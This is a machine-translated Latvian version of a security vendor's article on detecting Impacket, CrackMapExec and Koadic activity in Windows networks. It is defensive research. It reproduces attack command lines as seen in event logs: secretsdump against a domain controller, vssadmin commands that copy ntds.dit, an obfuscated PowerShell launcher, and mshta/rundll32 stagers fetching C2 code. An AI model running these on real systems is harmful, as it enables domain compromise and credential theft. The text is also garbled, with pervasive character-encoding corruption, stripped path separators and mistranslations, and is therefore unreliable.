Kā atklāt uzbrukumus Windows infrastruktūrai: hakeru rīku izpēte

Kā atklāt uzbrukumus Windows infrastruktūrai: hakeru rīku izpēte

Uzbrukumu skaits korporatÄ«vajā sektorā katru gadu pieaug: piemēram 2017. gadā reÄ£istrēts par 13% vairāk unikālu incidentu nekā 2016. gadā, un 2018. gada beigās - Par 27% vairāk incidentunekā iepriekŔējā periodā. Ieskaitot tos, kur galvenais darba rÄ«ks ir Windows operētājsistēma. 2017.ā€“2018. gadā APT Dragonfly, APT28, APT MuddyWater veica uzbrukumus valdÄ«bai un militārajām organizācijām Eiropā, Ziemeļamerikā un SaÅ«da Arābijā. Un Å”im nolÅ«kam mēs izmantojām trÄ«s rÄ«kus - Impact, CrackMapExec Šø Koadic. Viņu pirmkods ir atvērts un pieejams vietnē GitHub.

Ir vērts atzÄ«mēt, ka Å”ie rÄ«ki netiek izmantoti sākotnējai iespieÅ”anai, bet gan uzbrukuma attÄ«stÄ«Å”anai infrastruktÅ«rā. Uzbrucēji tos izmanto dažādos uzbrukuma posmos pēc iekļūŔanas perimetrā. To, starp citu, ir grÅ«ti noteikt un bieži vien tikai ar tehnoloÄ£iju palÄ«dzÄ«bu kompromisa pēdu identificÄ“Å”ana tÄ«kla trafikā vai instrumenti, kas ļauj atklāt aktÄ«vās uzbrucēja darbÄ«bas pēc tam, kad viņŔ ir iekļuvis infrastruktÅ«rā. RÄ«ki nodroÅ”ina dažādas funkcijas, sākot no failu pārsÅ«tÄ«Å”anas lÄ«dz mijiedarbÄ«bai ar reÄ£istru un komandu izpildi attālā datorā. Mēs veicām Å”o rÄ«ku izpēti, lai noteiktu to tÄ«kla darbÄ«bu.

Kas mums bija jādara:

  • Izprotiet, kā darbojas uzlauÅ”anas rÄ«ki. Uzziniet, kas uzbrucējiem ir jāizmanto un kādas tehnoloÄ£ijas viņi var izmantot.
  • Atrodiet to, ko informācijas droŔības rÄ«ki neatklāj uzbrukuma pirmajos posmos. IzlÅ«koÅ”anas fāzi var izlaist vai nu tāpēc, ka uzbrucējs ir iekŔējs uzbrucējs, vai arÄ« tāpēc, ka uzbrucējs izmanto infrastruktÅ«ras robu, kas iepriekÅ” nebija zināms. Kļūst iespējams atjaunot visu viņa darbÄ«bu ķēdi, lÄ«dz ar to arÄ« vēlmi atklāt turpmāku kustÄ«bu.
  • Novērsiet viltus pozitÄ«vus rezultātus no ielauÅ”anās noteikÅ”anas rÄ«kiem. Mēs nedrÄ«kstam aizmirst, ka tad, kad noteiktas darbÄ«bas tiek konstatētas, pamatojoties tikai uz izlÅ«koÅ”anu, ir iespējamas biežas kļūdas. Parasti infrastruktÅ«rā ir pietiekami daudz veidu, kas no pirmā acu uzmetiena nav atŔķirami no likumÄ«giem, lai iegÅ«tu jebkādu informāciju.

Ko Å”ie rÄ«ki sniedz uzbrucējiem? Ja tas ir Impacket, tad uzbrucēji saņem lielu moduļu bibliotēku, ko var izmantot dažādos uzbrukuma posmos, kas seko pēc perimetra pārkāpÅ”anas. Daudzi rÄ«ki iekŔēji izmanto Impacket moduļus, piemēram, Metasploit. Tam ir dcomexec un wmiexec attālai komandu izpildei, secretsdump kontu iegÅ«Å”anai no atmiņas, kas tiek pievienoti no Impacket. Rezultātā pareiza Ŕādas bibliotēkas darbÄ«bas noteikÅ”ana nodroÅ”inās atvasinājumu noteikÅ”anu.

Tā nav nejauŔība, ka veidotāji par CrackMapExec (vai vienkārÅ”i CME) uzrakstÄ«ja ā€œPowered by Impacketā€. Turklāt CME ir gatava funkcionalitāte populāriem scenārijiem: Mimikatz paroļu vai to jaucējkodu iegÅ«Å”anai, Meterpreter vai Empire aÄ£enta ievieÅ”ana attālinātai izpildei un Bloodhound uz klāja.

TreÅ”ais rÄ«ks, ko izvēlējāmies, bija Koadic. Tas ir pavisam nesen, tas tika prezentēts starptautiskajā hakeru konferencē DEFCON 25 2017. gadā un atŔķiras ar nestandarta pieeju: darbojas, izmantojot HTTP, Java Script un Microsoft Visual Basic Script (VBS). Å o pieeju sauc par dzÄ«voÅ”anu ārpus zemes: rÄ«ks izmanto sistēmā Windows iebÅ«vētu atkarÄ«bu un bibliotēku kopu. RadÄ«tāji to sauc par COM Command & Control vai C3.

IMPACKET

Impacket funkcionalitāte ir ļoti plaÅ”a, sākot no izlÅ«koÅ”anas AD iekÅ”ienē un datu vākÅ”anas no iekŔējiem MS SQL serveriem lÄ«dz akreditācijas datu iegÅ«Å”anas paņēmieniem: tas ir SMB releja uzbrukums un faila ntds.dit iegÅ«Å”ana, kas satur lietotāju paroļu jaucējus no domēna kontrollera. Impacket arÄ« izpilda komandas attālināti, izmantojot četras dažādas metodes: WMI, Windows Scheduler Management Service, DCOM un SMB, un, lai to izdarÄ«tu, ir nepiecieÅ”ami akreditācijas dati.

Noslēpumu izgāztuve

ApskatÄ«sim Secretsdump. Å is ir modulis, kas var mērķēt gan uz lietotāju maŔīnām, gan domēna kontrolleriem. To var izmantot, lai iegÅ«tu LSA, SAM, SECURITY, NTDS.dit atmiņas apgabalu kopijas, tāpēc to var redzēt dažādos uzbrukuma posmos. Pirmais solis moduļa darbÄ«bā ir autentifikācija, izmantojot SMB, kas prasa vai nu lietotāja paroli, vai tā jaucējkodu, lai automātiski veiktu Pass the Hash uzbrukumu. Tālāk nāk pieprasÄ«jums atvērt piekļuvi Service Control Manager (SCM) un piekļūt reÄ£istram, izmantojot winreg protokolu, ar kura palÄ«dzÄ«bu uzbrucējs var uzzināt interesējoÅ”o filiāļu datus un iegÅ«t rezultātus, izmantojot SMB.

Attēlā 1 mēs redzam, kā tieÅ”i, izmantojot winreg protokolu, piekļuve tiek iegÅ«ta, izmantojot reÄ£istra atslēgu ar LSA. Lai to izdarÄ«tu, izmantojiet komandu DCERPC ar opkodu 15 - OpenKey.

Kā atklāt uzbrukumus Windows infrastruktūrai: hakeru rīku izpēte
RÄ«si. 1. ReÄ£istra atslēgas atvērÅ”ana, izmantojot winreg protokolu

Pēc tam, kad tiek iegÅ«ta piekļuve atslēgai, vērtÄ«bas tiek saglabātas ar komandu SaveKey ar opkodu 20. Impacket to dara ļoti specifiskā veidā. Tas saglabā vērtÄ«bas failā, kura nosaukums ir 8 nejauÅ”u rakstzÄ«mju virkne, kas pievienota .tmp. Turklāt Ŕī faila tālāka augÅ”upielāde notiek, izmantojot SMB no System32 direktorijas (2. att.).

Kā atklāt uzbrukumus Windows infrastruktūrai: hakeru rīku izpēte
RÄ«si. 2. Shēma reÄ£istra atslēgas iegÅ«Å”anai no attālās maŔīnas

Izrādās, ka Ŕādu aktivitāti tÄ«klā var noteikt pēc vaicājumiem noteiktām reÄ£istra filiālēm, izmantojot winreg protokolu, konkrētus nosaukumus, komandas un to secÄ«bu.

Šis modulis atstāj pēdas arī Windows notikumu žurnālā, padarot to viegli nosakāmu. Piemēram, komandas izpildes rezultātā

secretsdump.py -debug -system SYSTEM -sam SAM -ntds NTDS -security SECURITY -bootkey BOOTKEY -outputfile 1.txt -use-vss -exec-method mmcexec -user-status -dc-ip 192.168.202.100 -target-ip 192.168.202.100 contoso/Administrator:@DC

Windows Server 2016 žurnālā mēs redzēsim Ŕādu galveno notikumu secÄ«bu:

1. 4624 - attālināta pieteikŔanās.
2. 5145 - piekļuves tiesību pārbaude winreg attālajam pakalpojumam.
3. 5145 - failu piekļuves tiesÄ«bu pārbaude System32 direktorijā. Failam ir iepriekÅ” minētais nejauÅ”ais nosaukums.
4. 4688 ā€” cmd.exe procesa izveide, kas palaiž vssadmin:

ā€œC:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin list shadows ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

5. 4688 - procesa izveide ar komandu:

"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin create shadow /For=C: ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

6. 4688 - procesa izveide ar komandu:

"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C copy ?GLOBALROOTDeviceHarddiskVolumeShadowCopy3WindowsNTDSntds.dit %SYSTEMROOT%TemprmumAfcn.tmp ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

7. 4688 - procesa izveide ar komandu:

"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin delete shadows /For=C: /Quiet ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

Smbexec

Tāpat kā daudziem pēcekspluatācijas rÄ«kiem, arÄ« Impacket ir moduļi komandu attālinātai izpildei. Mēs koncentrēsimies uz smbexec, kas nodroÅ”ina interaktÄ«vu komandu apvalku attālā datorā. Å im modulim ir nepiecieÅ”ama arÄ« autentifikācija, izmantojot SMB, vai nu ar paroli, vai paroles jaucējkodu. Attēlā 3. attēlā redzams piemērs, kā Ŕāds rÄ«ks darbojas, Å”ajā gadÄ«jumā tā ir vietējā administratora konsole.

Kā atklāt uzbrukumus Windows infrastruktūrai: hakeru rīku izpēte
Rīsi. 3. Interaktīva smbexec konsole

Pirmais smbexec solis pēc autentifikācijas ir SCM atvērÅ”ana ar OpenSCManagerW komandu (15). Vaicājums ir ievērojams: lauks MachineName ir DUMMY.

Kā atklāt uzbrukumus Windows infrastruktūrai: hakeru rīku izpēte
Rīsi. 4. Pieprasījums atvērt Service Control Manager

Pēc tam pakalpojums tiek izveidots, izmantojot komandu CreateServiceW (12). Smbexec gadÄ«jumā mēs katru reizi varam redzēt vienu un to paÅ”u komandu uzbÅ«ves loÄ£iku. Attēlā 5 zaļa norāda nemaināmus komandas parametrus, dzeltena norāda, ko uzbrucējs var mainÄ«t. Ir viegli redzēt, ka izpildāmā faila nosaukumu, tā direktoriju un izvades failu var mainÄ«t, bet pārējo ir daudz grÅ«tāk mainÄ«t, netraucējot Impacket moduļa loÄ£iku.

Kā atklāt uzbrukumus Windows infrastruktūrai: hakeru rīku izpēte
Rīsi. 5. Pieprasīt pakalpojuma izveidi, izmantojot pakalpojumu kontroles pārvaldnieku

Smbexec arÄ« atstāj acÄ«mredzamas pēdas Windows notikumu žurnālā. Operētājsistēmas Windows Server 2016 žurnālā interaktÄ«vās komandas apvalkam ar komandu ipconfig mēs redzēsim Ŕādu atslēgu notikumu secÄ«bu:

1. 4697 ā€” pakalpojuma uzstādÄ«Å”ana cietuŔā maŔīnā:

%COMSPEC% /Q /c echo cd ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

2. 4688 - cmd.exe procesa izveide ar argumentiem no 1. punkta.
3. 5145 - piekļuves tiesību pārbaude __izejas failam C$ direktorijā.
4. 4697 ā€” pakalpojuma uzstādÄ«Å”ana cietuŔā maŔīnā.

%COMSPEC% /Q /c echo ipconfig ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

5. 4688 - cmd.exe procesa izveide ar argumentiem no 4. punkta.
6. 5145 - piekļuves tiesību pārbaude __izejas failam C$ direktorijā.

Impacet ir uzbrukuma rÄ«ku izstrādes pamats. Tas atbalsta gandrÄ«z visus Windows infrastruktÅ«ras protokolus, un tajā paŔā laikā tam ir savas raksturÄ«gās iezÄ«mes. Å eit ir norādÄ«ti konkrēti winreg pieprasÄ«jumi un SCM API izmantoÅ”ana ar raksturÄ«gu komandu veidoÅ”anu, faila nosaukuma formāts un SMB koplietoÅ”ana SYSTEM32.

CRACKMAPEXEC

CME rÄ«ks galvenokārt ir paredzēts, lai automatizētu tās parastās darbÄ«bas, kas uzbrucējam ir jāveic, lai pārvietotos tÄ«klā. Tas ļauj strādāt kopā ar labi zināmo Empire aÄ£entu un Meterpreter. Lai komandas izpildÄ«tu slēpti, CME var tās aizēnot. Izmantojot Bloodhound (atseviŔķs izlÅ«koÅ”anas rÄ«ks), uzbrucējs var automatizēt aktÄ«vās domēna administratora sesijas meklÄ“Å”anu.

Bloodhound

Bloodhound kā atseviŔķs rÄ«ks ļauj veikt uzlabotu izlÅ«koÅ”anu tÄ«klā. Tas apkopo datus par lietotājiem, iekārtām, grupām, sesijām un tiek piegādāts kā PowerShell skripts vai binārs fails. Informācijas apkopoÅ”anai tiek izmantoti LDAP vai SMB protokoli. CME integrācijas modulis ļauj Bloodhound lejupielādēt upura maŔīnā, palaist un saņemt savāktos datus pēc izpildes, tādējādi automatizējot darbÄ«bas sistēmā un padarot tās mazāk pamanāmas. Bloodhound grafiskais apvalks apkopo savāktos datus grafiku veidā, kas ļauj atrast Ä«sāko ceļu no uzbrucēja maŔīnas lÄ«dz domēna administratoram.

Kā atklāt uzbrukumus Windows infrastruktūrai: hakeru rīku izpēte
RÄ«si. 6. Bloodhound interfeiss

Lai palaistu upura maŔīnā, modulis izveido uzdevumu, izmantojot ATSVC un SMB. ATSVC ir saskarne darbam ar Windows uzdevumu plānotāju. CME izmanto savu NetrJobAdd(1) funkciju, lai izveidotu uzdevumus tÄ«klā. Piemērs tam, ko CME modulis nosÅ«ta, ir parādÄ«ts attēlā. 7: Å is ir cmd.exe komandas izsaukums un aptumÅ”otais kods argumentu veidā XML formātā.

Kā atklāt uzbrukumus Windows infrastruktūrai: hakeru rīku izpēte
7. att. Uzdevuma izveide, izmantojot CME

Pēc uzdevuma iesniegÅ”anas izpildei cietuŔā maŔīna pati iedarbina Bloodhound, un tas ir redzams satiksmē. Moduli raksturo LDAP vaicājumi, lai iegÅ«tu standarta grupas, visu iekārtu un lietotāju sarakstu domēnā un iegÅ«tu informāciju par aktÄ«vajām lietotāju sesijām, izmantojot SRVSVC NetSessEnum pieprasÄ«jumu.

Kā atklāt uzbrukumus Windows infrastruktūrai: hakeru rīku izpēte
Rīsi. 8. Aktīvo sesiju saraksta iegūŔana, izmantojot SMB

Turklāt, palaižot Bloodhound upura maŔīnā ar iespējotu auditÄ“Å”anu, tiek parādÄ«ts notikums ar ID 4688 (procesa izveide) un procesa nosaukums. Ā«C:WindowsSystem32cmd.exeĀ». Ievērojami ir komandrindas argumenti:

cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C " & ( $eNV:cOmSPEc[4,26,25]-JOiN'')( [chAR[]](91 , 78, 101,116 , 46, 83 , 101 , ā€¦ , 40,41 )-jOIN'' ) "

Enum_avproducts

Modulis enum_avproducts ir ļoti interesants no funkcionalitātes un ievieÅ”anas viedokļa. WMI ļauj izmantot WQL vaicājumu valodu, lai izgÅ«tu datus no dažādiem Windows objektiem, kas bÅ«tÄ«bā ir tas, ko izmanto Å”is CME modulis. Tas Ä£enerē vaicājumus AntiSpywareProduct un AntiŠœirusProduct klasēm par aizsardzÄ«bas rÄ«kiem, kas instalēti upura datorā. Lai iegÅ«tu nepiecieÅ”amos datus, modulis pieslēdzas rootSecurityCenter2 nosaukumvietai, pēc tam Ä£enerē WQL vaicājumu un saņem atbildi. Attēlā 9. attēlā parādÄ«ts Ŕādu pieprasÄ«jumu un atbilžu saturs. MÅ«su piemērā tika atrasts Windows Defender.

Kā atklāt uzbrukumus Windows infrastruktūrai: hakeru rīku izpēte
Rīsi. 9. Moduļa enum_avproducts tīkla darbība

Bieži vien WMI auditÄ“Å”ana (Trace WMI-Activity), kuras pasākumos var atrast noderÄ«gu informāciju par WQL vaicājumiem, var tikt atspējota. Bet, ja tas ir iespējots, tad, ja tiek palaists skripts enum_avproducts, tiks saglabāts notikums ar ID 11. Tas saturēs pieprasÄ«jumu nosÅ«tÄ«juŔā lietotāja vārdu un vārdu rootSecurityCenter2 nosaukumvietā.

Katram no CME moduļiem bija savi artefakti, neatkarÄ«gi no tā, vai tie ir specifiski WQL vaicājumi vai noteikta veida uzdevuma izveide uzdevumu plānotājā ar obfuscÄ“Å”anu un Bloodhound specifiskām darbÄ«bām LDAP un SMB.

KOADIC

Koadic atŔķirÄ«ga iezÄ«me ir sistēmā Windows iebÅ«vēto JavaScript un VBScript tulku izmantoÅ”ana. Å ajā ziņā tas seko dzÄ«ves no zemes tendencei - tas ir, tam nav ārēju atkarÄ«bu un tiek izmantoti standarta Windows rÄ«ki. Å is ir rÄ«ks pilnai Command & Control (CnC), jo pēc inficÄ“Å”anās iekārtai tiek uzstādÄ«ts ā€œimplantsā€, kas ļauj to kontrolēt. Koadic terminoloÄ£ijā Ŕādu maŔīnu sauc par ā€œzombijuā€. Ja upura pusē nav pietiekamu privilēģiju pilnÄ«gai darbÄ«bai, Koadic ir iespēja tās palielināt, izmantojot lietotāja konta kontroles apieÅ”anas (UAC bypass) metodes.

Kā atklāt uzbrukumus Windows infrastruktūrai: hakeru rīku izpēte
RÄ«si. 10. Koadic Shell

CietuÅ”ajam ir jāuzsāk saziņa ar Command & Control serveri. Lai to izdarÄ«tu, viņai jāsazinās ar iepriekÅ” sagatavotu URI un jāsaņem galvenais Koadic korpuss, izmantojot vienu no skatuves. Attēlā 11. attēlā parādÄ«ts mshta stager piemērs.

Kā atklāt uzbrukumus Windows infrastruktūrai: hakeru rīku izpēte
Rīsi. 11. Sesijas inicializācija ar CnC serveri

Pamatojoties uz atbildes mainÄ«go WS, kļūst skaidrs, ka izpilde notiek, izmantojot WScript.Shell, un mainÄ«gie STAGER, SESSIONKEY, JOBKEY, JOBKEYPATH, EXPIRE satur galveno informāciju par paÅ”reizējās sesijas parametriem. Å is ir pirmais pieprasÄ«juma un atbildes pāris HTTP savienojumā ar CnC serveri. Turpmākie pieprasÄ«jumi ir tieÅ”i saistÄ«ti ar izsaukto moduļu (implantu) funkcionalitāti. Visi Koadic moduļi darbojas tikai ar aktÄ«vu sesiju ar CnC.

Mimikatz

Tāpat kā CME strādā ar Bloodhound, Koadic strādā ar Mimikatz kā atseviŔķu programmu, un tam ir vairāki veidi, kā to palaist. Tālāk ir parādīts pieprasījuma un atbildes pāris Mimikatz implanta lejupielādei.

Kā atklāt uzbrukumus Windows infrastruktūrai: hakeru rīku izpēte
Rīsi. 12. Pārsūtiet Mimikatz uz Koadic

Varat redzēt, kā ir mainÄ«jies pieprasÄ«juma URI formāts. Tagad tajā ir iekļauta vērtÄ«ba csrf mainÄ«gajam, kas ir atbildÄ«gs par atlasÄ«to moduli. Nepievērsiet uzmanÄ«bu viņas vārdam; Mēs visi zinām, ka CSRF parasti saprot atŔķirÄ«gi. Atbilde bija tā pati Koadic galvenā daļa, kurai tika pievienots kods, kas saistÄ«ts ar Mimikatz. Tas ir diezgan liels, tāpēc apskatÄ«sim galvenos punktus. Å eit mums ir Mimikatz bibliotēka, kas kodēta base64, serializēta .NET klase, kas to ievadÄ«s, un argumenti Mimikatz palaiÅ”anai. Izpildes rezultāts tiek pārsÅ«tÄ«ts tÄ«klā skaidrā tekstā.

Kā atklāt uzbrukumus Windows infrastruktūrai: hakeru rīku izpēte
Rīsi. 13. Mimikatz palaiŔanas rezultāts attālā maŔīnā

Exec_cmd

Koadic ir arÄ« moduļi, kas var izpildÄ«t komandas attālināti. Å eit mēs redzēsim to paÅ”u URI Ä£enerÄ“Å”anas metodi un pazÄ«stamos sid un csrf mainÄ«gos. Moduļa exec_cmd gadÄ«jumā pamattekstam tiek pievienots kods, kas spēj izpildÄ«t čaulas komandas. Tālāk ir parādÄ«ts Ŕāds kods, kas ietverts CnC servera HTTP atbildē.

Kā atklāt uzbrukumus Windows infrastruktūrai: hakeru rīku izpēte
RÄ«si. 14. Implanta kods exec_cmd

Koda izpildei ir nepiecieŔams mainīgais GAWTUUGCFI ar pazīstamo WS atribūtu. Ar tās palīdzību implants izsauc apvalku, apstrādājot divus koda zarus - shell.exec ar izejas datu straumes atgrieŔanu un shell.run bez atgrieŔanās.

Koadic nav tipisks rīks, taču tam ir savi artefakti, pēc kuriem to var atrast likumīgā trafikā:

  • Ä«paÅ”a HTTP pieprasÄ«jumu veidoÅ”ana,
  • izmantojot winHttpRequests API,
  • izveidojot WScript.Shell objektu, izmantojot ActiveXObject,
  • liels izpildāmais korpuss.

Sākotnējo savienojumu uzsāk stadijas programma, tāpēc ir iespējams noteikt tā darbību, izmantojot Windows notikumus. Mshta tas ir notikums 4688, kas norāda uz procesa izveidi ar sākuma atribūtu:

C:Windowssystem32mshta.exe http://192.168.211.1:9999/dXpT6

Kamēr Koadic darbojas, jūs varat redzēt citus 4688 notikumus ar atribūtiem, kas to lieliski raksturo:

rundll32.exe http://192.168.241.1:9999/dXpT6?sid=1dbef04007a64fba83edb3f3928c9c6c; csrf=;......mshtml,RunHTMLApplication
rundll32.exe http://192.168.202.136:9999/dXpT6?sid=12e0bbf6e9e5405690e5ede8ed651100;csrf=18f93a28e0874f0d8d475d154bed1983;......mshtml,RunHTMLApplication
"C:Windowssystem32cmd.exe" /q /c chcp 437 & net session 1> C:Usersuser02AppDataLocalTemp6dc91b53-ddef-2357-4457-04a3c333db06.txt 2>&1
"C:Windowssystem32cmd.exe" /q /c chcp 437 & ipconfig 1> C:Usersuser02AppDataLocalTemp721d2d0a-890f-9549-96bd-875a495689b7.txt 2>&1

Atzinumi

Noziedznieku vidÅ« popularitāti iegÅ«st tendence dzÄ«vot no zemes. Viņi savām vajadzÄ«bām izmanto sistēmā Windows iebÅ«vētos rÄ«kus un mehānismus. Mēs redzam, ka populāri rÄ«ki Koadic, CrackMapExec un Impacket, ievērojot Å”o principu, arvien biežāk parādās APT pārskatos. ArÄ« GitHub dakÅ”u skaits Å”iem rÄ«kiem pieaug, un parādās jauni (Å”obrÄ«d tādu ir jau aptuveni tÅ«kstotis). Å Ä« tendence kļūst arvien populārāka tās vienkārŔības dēļ: uzbrucējiem nav nepiecieÅ”ami treÅ”o puÅ”u rÄ«ki, tie jau atrodas upuru iekārtās un palÄ«dz viņiem apiet droŔības pasākumus. Mēs koncentrējamies uz tÄ«kla komunikācijas izpēti: katrs iepriekÅ” aprakstÄ«tais rÄ«ks atstāj savas pēdas tÄ«kla trafikā; detalizēta to izpēte ļāva mums mācÄ«t mÅ«su produktu PT tÄ«kla uzbrukuma atklāŔana atklāt tos, kas galu galā palÄ«dz izmeklēt visu ar viņiem saistÄ«to kiberincidentu ķēdi.

Autori:

  • Antons Tyurins, PT ekspertu droŔības centra pozitÄ«vo tehnoloÄ£iju ekspertu pakalpojumu nodaļas vadÄ«tājs
  • Egors Podmokovs, PT ekspertu droŔības centra pozitÄ«vo tehnoloÄ£iju eksperts

Avots: www.habr.com

Pievieno komentāru